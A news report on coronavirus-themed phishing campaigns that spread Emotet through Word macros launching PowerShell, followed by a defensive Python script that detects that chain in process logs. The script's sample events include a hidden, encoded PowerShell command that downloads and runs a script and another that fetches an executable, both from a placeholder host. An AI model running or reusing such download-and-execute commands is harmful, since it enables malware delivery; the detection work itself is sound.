Reports: Cybercriminals Using Health Emergency Messages to Spread Malware
Cybercriminals are using fake email messages about the coronavirus to spread the Emotet Trojan as well as other malware, according to reports released this week by IBM and Kaspersky.
On Thursday, the United Nations' World Health Organization declared the coronavirus outbreak a public health emergency. The virus, which was first spotted in Wuhan, China, in December, has now spread to other nations, including the United States.
The death toll from the virus reached 213 on Friday with more than 9,600 infections being confirmed worldwide, Reuters reported, citing Chinese and World Health Organization data.
In the cases that IBM X-Force researchers have discovered, the emails, which contain malicious Microsoft Word attachments, are mainly focused on Japan. The cybercriminals spreading the Emotet Trojan apparently are attempting to target regions closer to China, where the coronavirus originated, but it’s likely that their tactics will shift to other countries in the coming weeks, according to IBM.
“We expect to see more malicious email traffic based on the coronavirus in the future, as the infection spreads,” the IBM researchers say. “In these first samples, Japanese victims were probably targeted due to their proximity to China. Unfortunately, it is quite common for threat actors to exploit basic human emotions such as fear – especially if a global event has already caused terror and panic.”
Kaspersky researchers also have found a number of spam campaigns using coronavirus warnings to target victims, according to a report shared with Information Security Media Group. In many cases, the analysts found cybercriminals attempting to deploy a number of Trojans to victims’ devices.
“So far, we have seen only 10 unique files, but as this sort of activity often happens with popular media topics, we expect that this tendency may grow,” says Anton Ivanov, a Kaspersky malware analyst. “As people continue to be worried for their health, we may see more and more malware hidden inside fake documents about the coronavirus being spread.”
In the cases from Japan, IBM analysts note that many of the emails are designed to appear to originate from a disability welfare service provider in that country.
In one email, the attackers state the coronavirus has been detected in the Gifu region of Japan, while another mentions Osaka. The attackers seem to be using specifically tailored warnings and language to scare inhabitants in these areas, making them more likely to click on the attachment, according to IBM. The emails also end with a footer that mentions a legitimate postal address as well as a phone and fax number, the IBM report states.
Email targeting victims in Japan (Source: IBM)
Each of these emails contains an attached Word document, which is presented as offering updates and health information, according to IBM. If the attachment is opened and macros are enabled in Office, however, an obfuscated VBA macro runs in the background, launching a PowerShell script that downloads the Emotet Trojan, according to IBM.
“Previously, Japanese Emotet emails have been focused on corporate-style payment notifications and invoices, following a similar strategy as emails targeting European victims. This new approach to delivering Emotet may be significantly more successful, due to the wide impact of the coronavirus and the fear of infection surrounding it,” the X-Force report says.
Emotet on the Rise
Over the last several months, security researchers and government agencies have been issuing warnings about increases in Emotet attacks.
The U.S. Cybersecurity and Infrastructure Security Agency recently warned that it's seen a surge in targeted attacks using Emotet (see: Emotet Malware Alert Sounded by US Cybersecurity Agency).
While Emotet started its life as a banking Trojan five years ago, its developers have added additional functionality, including making the malware a dropper, so that it can be used to install additional malicious code on endpoints it’s infected, as well as giving it the ability to scrape victims’ PCs for contact information. In addition, other attackers have increasingly rented Emotet botnets to install other malware, including Trickbot and various strains of ransomware, according to security researchers.
Once the malware is downloaded, Emotet uses the infected system to send out additional phishing emails and spam in an effort to grow the botnet, according to researchers at Cofense.
Emotet attackers have also previously used emails about topics in the news to spread the malware. In September 2019, for instance, attackers used phishing emails that claimed to contain a version of Edward Snowden's memoir, which had been released a week prior, in an attached Microsoft Word file. Once the document was opened, malicious macros in it triggered a PowerShell command, which then downloaded Emotet malware onto the infected device (see: Emotet Botnet Now Using Snowden's Memoir as a Lure).
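The infection chain described for both the Japanese coronavirus lures and the Snowden memoir lure (a Word macro launching PowerShell, which fetches Emotet) is what endpoint telemetry can catch regardless of the lure text. The following is an added example, not code from IBM, Kaspersky or this article: it scans process-creation events for an Office process spawning a script interpreter, decodes any -EncodedCommand payload so the downloader cmdlet is visible to keyword matching, and flags the event. The event field names are modelled on Sysmon Event ID 1, the sample events are constructed here, and the host example.invalid is a placeholder rather than an indicator from any report.

```python
"""Flag the Word-macro -> PowerShell -> download chain in process-creation logs.

Added example (not from the IBM, Kaspersky or ISMG reports). Event field
names are modelled on Sysmon Event ID 1; the sample events below are
constructed, and example.invalid is a placeholder host.
"""
import base64
import json
import re

# Process names that indicate a document-borne macro (Office) as the parent.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Interpreters a macro typically launches to fetch the second stage.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Cmdlets and .NET classes commonly used to pull a payload from the web.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
    r"net\.webclient|start-bitstransfer|invoke-restmethod",
    re.IGNORECASE,
)
# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def encode_command(script):
    """Encode a script the way -EncodedCommand expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload from a command line, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation event; returns its indicators and a verdict."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Match download primitives against the decoded payload too, otherwise an
    # encoded command hides the downloader string from keyword matching.
    visible = cmdline + (" " + decoded if decoded else "")

    indicators = []
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        indicators.append("office_spawns_interpreter")
    if decoded is not None:
        indicators.append("encoded_command")
    if HIDDEN_RE.search(cmdline):
        indicators.append("hidden_window")
    if DOWNLOAD_RE.search(visible):
        indicators.append("web_download")

    # An Office process launching an interpreter is itself a strong signal;
    # otherwise require both a download primitive and an attempt to hide.
    suspicious = "office_spawns_interpreter" in indicators or (
        "web_download" in indicators and "hidden_window" in indicators
    )
    return {"pid": event.get("ProcessId"), "parent": parent, "child": child,
            "decoded_command": decoded, "indicators": indicators, "suspicious": suspicious}


# Constructed sample events; the first mimics the macro -> PowerShell chain.
MACRO_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/doc.php')"
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(MACRO_STAGE2)},
    {"ProcessId": 5008,  # benign: an administrator's interactive shell
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU"},
    {"ProcessId": 5121,  # no Office parent, but hidden window plus a download
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest http://example.invalid/a -OutFile a.exe"'},
]


def scan(events):
    """Return the analyses of all events flagged suspicious."""
    return [r for r in (analyze_event(e) for e in events) if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(json.dumps(hit, indent=2))
```

In practice this runs over EDR or Sysmon telemetry rather than an inline list; the parent/child check is the durable part, since the lure changes with the news cycle while the macro still has to start an interpreter to fetch its payload. Treat the download keywords as enrichment rather than the sole trigger, because obfuscated macros can split or encode them.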